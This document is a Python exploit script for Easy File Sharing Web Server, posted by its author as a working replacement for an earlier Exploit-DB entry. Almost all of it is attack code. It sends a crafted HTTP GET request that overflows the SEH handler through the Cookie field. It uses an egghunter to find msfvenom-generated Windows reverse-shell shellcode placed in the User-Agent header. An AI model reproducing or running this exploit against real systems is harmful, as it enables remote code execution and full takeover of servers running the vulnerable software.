Easy File Sharing Web Server EXPLOIT

###############################
MADE BY:-SARTHAK SAINI
EXPLOIT :-https://www.exploit-db.com/exploits/42261 ;IT WASN'T WORKING SO I MADE MY OWN
VULN SOFTWARE:-Easy File Sharing Web Server

DOWNLOAD LINK:-https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe

REFERENCE:-https://www.youtube.com/watch?v=Znrvsf8Trvg

###################################

SOURCE CODE:-


import socket
import os
import time
import struct
import sys

# IP address of host (set to localhost 127.0.0.1 because we are running it on our VM)
host = "192.168.42.205"
# Port of host
port = 80

limit=3000


#jumped 20 bytes to hop SEH

nseh = "\xeb\x14\x90\x90"

#pop-pop-ret instruction

seh = "\x05\x86\x01\x10"


nops="\x90"*30

#egghunter

buff="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
buff+="\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
hunter=buff

#our egg
egg="w00tw00t"


#reverse shell
#msfvenom -p windows/shell_reverse_tcp lhost=127.0.0.1 lport=1234 -f py --smallest -b '\x00'
buf =  ""
buf += "\x33\xc9\x66\xb9\x43\x01\xe8\xff\xff\xff\xff\xc1\x5e"
buf += "\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05\x06\x67"
buf += "\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43\x1e\x98\x46"
buf += "\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c\xe1\xb3\x1c\x40"
buf += "\x5e\x21\x08\x05\xe7\xe8\x25\x28\xed\xc9\xde\x7f\x79"
buf += "\xa4\x62\x21\xb9\x79\x08\xbe\x7a\x26\x40\xda\x72\x3a"
buf += "\xed\x6c\xb5\x66\x60\x40\x91\xc8\x0d\x5d\xa5\x7d\x01"
buf += "\xc2\x7e\xc0\x4d\x9b\x7f\xb0\xfc\x90\x9d\x5e\x55\x92"
buf += "\x6e\xb7\x2d\xaf\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a"
buf += "\xe8\x3c\x41\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e"
buf += "\xa3\xfa\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d"
buf += "\x24\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4"
buf += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd\xda"
buf += "\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88\x66\xf7"
buf += "\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xfc\xfd\xfe\xff\xf0"
buf += "\xe1\xf2\xe3\xdc\x5f\xb9\x68\x58\x46\x6f\x2c\xd6\xb8"
buf += "\xd6\xc0\xc0\xc1\xc3\xab\xc6\xc5\xc2\x15\x41\x2f\xa0"
buf += "\xdb\x9a\x9a\xa6\x56\x75\xa5\xb3\x2c\x01\x50\x16\xa3"
buf += "\xd4\x26\x94\xd3\xa9\x31\xb6\x2f\x55\x43\xb4\x1c\x31"
buf += "\x8d\x85\x8a\x8c\xe9\x63\x08\xbb\xba\xb9\xde\x06\x9b"
buf += "\xe0\xaa\xa2\x17\x0b\x91\x3f\xbd\xde\xc7\xfd\xfc\x73"
buf += "\xbb\x24\x11\xc4\x03\x40\x51\x56\x51\x5e\x5f\x4c\x5d"
buf += "\x42\x5b\x58\x5c\x46\x79\x6b\xdf\x2b\x93\xe9\xc2\x91"
buf += "\xf9\x54\x4d\x5a\xe2\x2e\x77\x28\xa6\x3f\x43\xdb\xf0"
buf += "\x9d\xd7\x9d\x8b\x7c\x43\x8a\xb8\x93\xb2\xcf\xe4\x0e"
buf += "\x35\x48\x3f\xb6\xcc\xd8\x4c\x3f\x80\x7b\x2e\x4c\x50"
buf += "\x2a\x41\x11\xbc\x91"

#2nd param payload

buff=egg
buff+=nops
buff+=buf


#1st param payload
tests="/.:/"
tests+="A"*53
tests+=nseh
tests+=seh
tests+=nops
tests+=hunter
tests+=nops
tests+="D"*int(3000-len(tests))


# Craft our HTTP GET request
request = "GET /vfolder.ghp HTTP/1.1\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent:" + buff + "\r\n"		#insert 2nd param here
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Referer: " + "http://" + host + "/" + "\r\n"
request += "Cookie: SESSIONID=16246; UserID=PassWD=" + tests + "; frmUserName=; frmUserPass=;"    # Insert buffer here
request += " rememberPass=pass"
request += "\r\n"
request += "Connection: keep-alive" + "\r\n"
request += "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n"

print "[*] Connecting to target: " + host

# Set up our socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    # Attempt to connect to host
    connect = s.connect((host, port))
    print "[*] Successfully connected to: " + host
except:
    print "[!] " + host + " didn't respond...\n"
    sys.exit(0)

# Send payload to target
print "[*] Sending payload to target..."
s.send(request + "\r\n\r\n")
print "[!] Payload has been sent!\n"
s.close()